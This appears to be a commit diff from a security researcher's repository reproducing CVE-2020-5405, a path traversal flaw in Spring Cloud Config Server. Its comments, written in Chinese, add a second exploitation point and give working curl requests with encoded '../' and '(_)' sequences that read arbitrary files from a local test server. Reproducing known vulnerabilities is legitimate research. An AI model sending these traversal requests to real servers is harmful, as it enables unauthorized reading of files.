CVE-2020-5405另一个利用点的添加

“threedr3am” · “threedr3am” · commit 6be438308630 · 2020-03-10T11:16:00.000+08:00
diff --git a/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml b/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml
@@ -23,11 +23,6 @@
       <artifactId>spring-cloud-config-server</artifactId>
       <version>2.2.1.RELEASE</version>
     </dependency>
-
-    <dependency>
-      <groupId>org.springframework.boot</groupId>
-      <artifactId>spring-boot-starter-actuator</artifactId>
-    </dependency>
   </dependencies>
 
   <build>
diff --git a/spring/spring-cloud-config-server-CVE-2020-5405/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java b/spring/spring-cloud-config-server-CVE-2020-5405/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java
@@ -16,6 +16,7 @@
  *
  * org.springframework.cloud.config.server.resource.GenericResourceRepository#isInvalidEncodedLocation
  *
+ * 利用点1：
  * curl http://127.0.0.1:9988/foo/profiles/%252f..%252f..%252f..%252fUsers%252fxuanyonghao%252ftmp/aaa.xxx
  * 读取/User/xuanyonghao/tmp/aaa.xxx文件
  * foo 对应 {application}
@@ -26,6 +27,15 @@
  * todo 1. 文件必须有后缀，也就是.txt等等。
  * todo 2. cloud: config: server: native: search-locations: file:///tmp/{label}，此处的目录需要有{application}或{profiles}或{label}，因为在上述触发点会对url对应段进行替换进来location，导致目录穿越，但是会限制文件后缀
  *
+ * 利用点2：
+ * org.springframework.cloud.config.server.resource.ResourceController#resolveLabel(java.lang.String)
+ * 利用此处把label处的(_)替换为/
+ *
+ * curl http://127.0.0.1:9988/foo/profiles/..%28_%29Users%28_%29xuanyonghao%28_%29tmp/aaa.xxx
+ *
+ * todo 条件限制：
+ * todo 1. 文件必须有后缀，也就是.txt等等。
+ * todo 2. 不像利用点1处，不需要配置{application}{profiles}{label}
  * @author threedr3am
  */
 package com.threedr3am.bug.spring.config.server;
